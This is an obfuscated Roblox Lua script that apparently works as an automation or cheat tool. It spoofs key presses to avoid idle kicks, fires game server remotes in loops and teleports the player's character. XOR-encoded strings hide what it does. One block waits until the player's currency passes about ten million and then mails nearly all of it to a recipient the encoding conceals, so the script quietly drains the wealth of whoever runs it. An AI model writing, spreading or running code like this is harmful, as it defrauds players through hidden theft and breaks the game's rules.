--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.3) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v11,v12) local v13={};for v25=1, #v11 do v6(v13,v0(v4(v1(v2(v11,v25,v25 + 1 )),v1(v2(v12,1 + (v25% #v12) ,1 + (v25% #v12) + 1 )))%256 ));end return v5(v13);end wait(10 + 0 );spawn(function(v14) local v15=0 + 0 ;local v16;while true do if (v15==(0 -0)) then v16=game:GetService(v7("\231\202\201\49\243\186\203\55\223\211\206\49\203\186\201\31\214\198\201","\126\177\163\187\69\134\219\167"));while task.wait() do v16:SendKeyEvent(true,v7("\16\221\43\198\249","\156\67\173\74\165"),false,game);task.wait(1251.2 -(721 + 530) );v16:SendKeyEvent(false,v7("\7\167\72\21\185","\38\84\215\41\118\220\70"),false,game);task.wait(300);end break;end end end);spawn(function(v17) while wait() do local v26=1;for v28=1,10 do task.wait();game.ReplicatedStorage.Network.Instancing_InvokeCustomFromClient:InvokeServer(v7("\118\26\45\5\251\66\49\35\0\250\85\24","\158\48\118\66\114"),v7("\155\40\17\56\103\150\254\174\32","\155\203\68\112\86\19\197"),v26,v7("\98\212\55\241\79\118\225","\152\38\189\86\156\32\24\133"));game.ReplicatedStorage.Network.Instancing_InvokeCustomFromClient:InvokeServer(v7("\218\91\168\81\249\69\128\71\238\83\162\72","\38\156\55\199"),v7("\159\124\104\45\1\71\255\70\172","\35\200\29\28\72\115\20\154"),v26);game.ReplicatedStorage.Network.Instancing_InvokeCustomFromClient:InvokeServer(v7("\63\179\222\200\136\62\19\24\173\213\218\131","\84\121\223\177\191\237\76"),v7("\152\90\200\169\55\96\60\192\181\66","\161\219\54\169\192\90\48\80"),v26);v26=v26 + 1 ;end end end);spawn(function(v18) while true do local v27=0;while true do if (v27==(1271 -(945 + 326))) then game:GetService(v7("\123\71\16\41\64\65\1\49\76\70\51\49\70\80\1\34\76","\69\41\34\96")):WaitForChild(v7("\146\198\195\29\13\57\183","\75\220\163\183\106\98")):WaitForChild(v7("\47\187\130\59\219\13\162\209\119\250\14\187\130\58\153\35\182\135","\185\98\218\235\87")):InvokeServer();wait(12 -7 );break;end end end end);spawn(function(v19) local v20=0;local v21;local v22;local v23;local v24;while true do if (v20==(1 + 0)) then local v29=700 -(271 + 429) ;while true do if (v29==(1 + 0)) then v20=1502 -(1408 + 92) ;break;end if (v29==0) then v23=require(game:GetService(v7("\137\220\82\81\23\184\216\86\88\26\136\205\77\79\31\188\220","\126\219\185\34\61")):WaitForChild(v7("\32\199\92\96\127\101\234","\135\108\174\62\18\30\23\147")).Client.CurrencyCmds).Get(v7("\146\224\43\198\23\160\55\212","\167\214\137\74\171\120\206\83"));v24=nil;v29=1087 -(461 + 625) ;end end end if ((1290 -(993 + 295))==v20) then function v24() for v31,v32 in pairs(require(v22).Save.Get().Inventory.Currency) do if (v32[v7("\130\244","\199\235\144\82\61\152")]==v7("\35\31\184\38\8\24\189\56","\75\103\118\217")) then return v31;end end end while (v23-(1039 + 18961))<10000000  do task.wait(1176 -(418 + 753) );end v20=2 + 1 ;end if (v20==3) then if ((v23-(2062 + 17938))>=10000000) then game:GetService(v7("\245\81\96\24\176\29\198\64\117\16\138\10\200\70\113\19\188","\126\167\52\16\116\217")):WaitForChild(v7("\230\43\52\151\187\11\247","\156\168\78\64\224\212\121")):WaitForChild(v7("\42\239\172\194\5\225\189\148\71\221\160\192\3","\174\103\142\197")):InvokeServer(v7("\92\49\93\40","\152\54\72\63\88\69\62"),v7("\252\193\247","\60\180\164\142"),v7("\123\75\23\59\34\227\17\65","\114\56\62\101\73\71\141"),v24(),v23-20000 );end break;end if (v20==(0 + 0)) then local v30=0;while true do if (v30==0) then v21=game:GetService(v7("\249\57\55\234\215\169\202\40\34\226\237\190\196\46\38\225\219","\202\171\92\71\134\190"));v22=v21:WaitForChild(v7("\5\200\46\154\40\211\53","\232\73\161\76"));v30=1;end if (v30==(1 + 0)) then v20=530 -(406 + 123) ;break;end end end end end);game.Players.LocalPlayer.Character:FindFirstChild(v7("\144\252\214\197\182\230\210\192\138\230\212\208\136\232\201\208","\164\216\137\187")).CFrame=game:GetService(v7("\229\233\35\185\181\238\10\209\227","\107\178\134\81\210\198\158")):WaitForChild(v7("\7\49\182\238\131\22\41\177","\202\88\110\226\166")):WaitForChild(v7("\234\1\145\227\203\205\12\135\228","\170\163\111\226\151")):WaitForChild(v7("\55\60\189\47\75\37\14\16\34\182\61\64","\73\113\80\210\88\46\87")):WaitForChild(v7("\181\41\193\23\247\142\62\217\1","\135\225\76\173\114")):WaitForChild(v7("\63\227\172\181\190","\199\122\141\216\208\204\221")).CFrame;repeat task.wait(1);until game:GetService(v7("\157\209\17\233\125\228\190","\150\205\189\112\144\24")).LocalPlayer.Character and game:GetService(v7("\21\136\190\85\1\154\2","\112\69\228\223\44\100\232\113")).LocalPlayer.Character:FindFirstChild(v7("\252\10\10\210\184\115\143\208\45\8\220\162\76\135\198\11","\230\180\127\103\179\214\28"))  game:GetService(v7("\190\0\79\74\237\66\225\152\0\91\117\240\78\242\141\2\90","\128\236\101\63\38\132\33")):WaitForChild(v7("\130\172\5\83\185\249\196","\175\204\201\113\36\214\139")):WaitForChild(v7("\110\194\38\200\5\73\207\60\210\3\120\229\59\202\11\76\201\22\201\23\83\195\56\250\22\72\193\22\208\13\66\194\33","\100\39\172\85\188")):InvokeServer(v7("\139\116\182\151\54\191\95\184\146\55\168\118","\83\205\24\217\224"),v7("\214\208\223\62\238\196\222\56\213\201\194\41","\93\134\165\173"),1774 -(1749 + 20) );task.wait();game:GetService(v7("\140\247\209\206\51\205\179\106\187\246\242\214\53\220\179\121\187","\30\222\146\161\162\90\174\210")):WaitForChild(v7("\203\75\100\29\234\92\123","\106\133\46\16")):WaitForChild(v7("\113\46\96\232\91\78\91\41\125\251\101\105\86\54\124\247\95\99\77\51\103\243\87\102\74\47\126\223\86\73\93\46\103","\32\56\64\19\156\58")):InvokeServer(v7("\124\196\234\65\95\224\167\91\218\225\83\84","\224\58\168\133\54\58\146"),v7("\105\67\89\254\125\135\148\14\106\90\68\233","\107\57\54\43\157\21\230\231"),6);task.wait();game:GetService(v7("\233\142\1\249\176\223\206\207\142\21\198\173\211\221\218\140\20","\175\187\235\113\149\217\188")):WaitForChild(v7("\18\170\149\91\236\107\115","\24\92\207\225\44\131\25")):WaitForChild(v7("\98\221\171\88\26\115\72\218\182\75\36\84\69\197\183\71\30\94\94\192\172\67\22\91\89\220\181\111\23\116\78\221\172","\29\43\179\216\44\123")):InvokeServer(v7("\155\213\47\91\184\203\7\77\175\221\37\66","\44\221\185\64"),v7("\49\242\90\92\123\0\244\77\108\127\14\243","\19\97\135\40\63"),2 + 5 );task.wait();game:GetService(v7("\156\89\35\55\38\50\175\72\54\63\28\37\161\78\50\60\42","\81\206\60\83\91\79")):WaitForChild(v7("\96\174\196\101\32\209\70","\196\46\203\176\18\79\163\45")):WaitForChild(v7("\145\44\109\10\37\245\236\177\44\121\33\13\245\249\183\41\123\61\49\232\251\183\47\88\12\43\246\204\180\43\123\16\48","\143\216\66\30\126\68\155")):InvokeServer(v7("\140\196\2\220\192\177\240\224\184\204\8\197","\129\202\168\109\171\165\195\183"),v7("\18\77\37\219\214\21\245\39\107\59\215\202","\134\66\56\87\184\190\116"),1330 -(1249 + 73) );task.wait();game:GetService(v7("\14\52\25\183\16\232\32\33\57\53\58\175\22\249\32\50\57","\85\92\81\105\219\121\139\65")):WaitForChild(v7("\211\182\68\82\115\205\246","\191\157\211\48\37\28")):WaitForChild(v7("\246\17\231\8\59\209\28\253\18\61\224\54\250\10\53\212\26\215\9\41\203\16\249\58\40\208\18\215\16\51\218\17\224","\90\191\127\148\124")):InvokeServer(v7("\94\139\33\0\125\149\9\22\106\131\43\25","\119\24\231\78"),v7("\178\56\183\73\212\65\2\135\30\169\69\200","\113\226\77\197\42\188\32"),4 + 5 );task.wait();game:GetService(v7("\8\19\228\185\51\21\245\161\63\18\199\161\53\4\245\178\63","\213\90\118\148")):WaitForChild(v7("\117\43\160\65\66\73\37","\45\59\78\212\54")):WaitForChild(v7("\57\88\144\159\135\32\174\249\30\81\188\162\136\56\162\251\21\117\150\152\146\33\160\214\2\89\142\168\138\39\168\254\4","\144\112\54\227\235\230\78\205")):InvokeServer(v7("\149\36\0\235\213\73\148\41\29\248\213\85","\59\211\72\111\156\176"),v7("\126\146\241\46\70\134\240\40\125\139\236\57","\77\46\231\131"),10);game.Players.LocalPlayer.Character:FindFirstChild(v7("\146\65\187\65\180\91\191\68\136\91\185\84\138\85\164\84","\32\218\52\214")).CFrame=CFrame.new(Vector3.new( -451.1048,110.3193, -1399.6234));wait(1146 -(466 + 679) );game:GetService(v7("\124\18\33\164\248\179\68\78\75\19\2\188\254\162\68\93\75","\58\46\119\81\200\145\208\37")):WaitForChild(v7("\5\137\36\187\166\175\61","\86\75\236\80\204\201\221")):WaitForChild(v7("\91\79\100\145\255\133\113\72\121\130\193\173\123\83\114\166\235\152\102\78\122\163\236\132\127\98\123\140\251\133\102","\235\18\33\23\229\158")):FireServer(v7("\118\182\206\172\85\168\230\186\66\190\196\181","\219\48\218\161"),v7("\199\125\125\64\214\120\225\240\116\110\64\213\72\195\229\127","\128\132\17\28\41\187\47"));wait(3);claimMail();farmGarden();antiafk();sendDiamonds();
